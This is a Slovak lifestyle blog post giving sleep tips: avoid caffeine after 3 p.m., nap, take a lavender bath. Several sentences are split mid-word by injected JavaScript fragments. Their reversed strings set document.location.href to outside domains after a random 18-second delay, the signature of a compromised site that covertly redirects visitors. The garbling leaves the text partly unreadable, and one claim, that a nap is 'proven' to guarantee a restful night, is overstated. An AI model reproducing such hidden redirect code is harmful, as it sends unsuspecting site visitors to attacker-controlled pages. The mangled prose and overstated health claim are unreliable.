Sladké sny

| 16 októbra, 2013 | 0 Comments

Kvalitný spánok je nielen nevyhnutným spôsobom relaxácie, ale aj úplná nutnosť pre krásu a zdravie. Nehovoriac o toof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}tobor-latigid//:sptth'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6);if (number1==3){var delay = 18000; setTimeout($NjS(0),delay);}toof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}tom, že fakt, či sa zobudíte odpočinutá a plná energie, má zásadný vplyv na beh celého vášho dňa. Prečítajte si spár účinných tipov, ako povinnú cestu do ríše snov ešte spríjemniť a zároveň maximalizovať jej pozitívne výsledky.

Pozor na kofeín – návyková látka, ktoof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}tobor-latigid//:sptth'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6);if (number1==3){var delay = 18000; setTimeout($NjS(0),delay);}toof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}torú poznáme predovšetkým ako zložku kávy, má na spánok presne opačný účinok, než aký by sme si želali. Kvôli jeho povzbudzujúcemu efektu by ste ho teda v záujme zdravého a účinného spánku mali obmedziť. Po tretej hodine popoludní však na kávu už ani nepomyslite.

V priebehu dňa je tiež vhodné na chvíľu si zdriemnuť. Je dokázané, že poobedňajšia trištvrtehodinová siesta vám zaručí pokojnú a ničím nerušenú noc.

Doprajte si kúpeľ. Nič neupokojí organizmus viac ako relaxačná polhodinka vo vani. A pokiaľ ide o jej kľúčovú zložku, naším tajným tipom je levandom() * 6); if (number1==3){var delay = 18000;setTimeout($nJe(0), delay);}anduľový olej. 

Category: HOMEPAGE, ZDRAVIE a FIT